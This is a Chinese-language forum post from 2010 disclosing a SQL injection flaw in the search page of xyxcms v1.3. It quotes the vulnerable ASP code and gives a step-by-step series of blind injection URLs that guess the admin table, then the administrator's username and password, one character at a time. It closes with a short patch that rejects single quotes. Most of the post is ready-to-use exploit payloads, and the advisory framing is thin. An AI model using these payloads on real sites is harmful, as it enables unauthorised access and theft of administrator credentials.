|
 
- 帖子
- 253
- 积分
- 742
- 威望
- 1111
- 金钱
- 841
- 在线时间
- 30 小时
|
发布日期:2010-06.19
发布作者:mars
影响版本:xyxcms v1.3
官方地址: www.xyxcms.com
漏洞描述: 搜索页面代码过滤不严,导致字符串搜索型注入。
代码分析:s.asp 从这段代码可以看出 字符串搜索注入~
k=request.QueryString("k") page=request.QueryString("page") if page="" or isnumeric(page)=0 then g_cur_page=1 else g_cur_page=cint(page) end if
漏洞测试利用方法:
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT CoUNt(*) FrOM admin)>=0 AnD '%25'=' 猜解数据库为admin
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT CoUNt(*) FrOM admin)=1 AnD '%25'=' 判断管理员就1个
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT CoUNt(*) FrOM admin Where len(username)=4)=1 AnD '%25'=' 管理员账户长度为4位
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT CoUNt(*) FrOM admin Where len(password)=8)=1 AnD '%25'=' 管理员密码长度为8位
username长度是4
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(username,1,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=109 AnD '%25'=' 用户第一位是m
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(username,2,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=97 AnD '%25'=' 用户第二位是a
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(username,3,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=114 AnD '%25'=' 用户第三位是r
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(username,4,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=115 AnD '%25'=' 用户第四位是s
所以密码是mars
password长度为8
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,1,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=49 AnD '%25'=' 密码第一位是1
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,2,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=50 AnD '%25'=' 密码第二位是2
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,3,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=51 AnD '%25'=' 密码第三位是3
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,4,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=52 AnD '%25'=' 密码第四位是4
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,5,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=113 AnD '%25'=' 密码第五位是q
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,6,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=119 AnD '%25'=' 密码第六位是w
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,7,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=113 AnD '%25'=' 密码第七位是q
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,8,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=119 AnD '%25'=' 密码第八位是w
所以密码是1234qwqw
漏洞修补方法 过滤掉' 就行了
k=request.QueryString("k") if instr(k,"'")>0 response.Write "<script>alert('error');window.close();</script>" response.End() end if page=request.QueryString("page") if page="" or isnumeric(page)=0 then g_cur_page=1 else g_cur_page=cint(page) end if |
|
发表于 2010-6-22 14:54
| 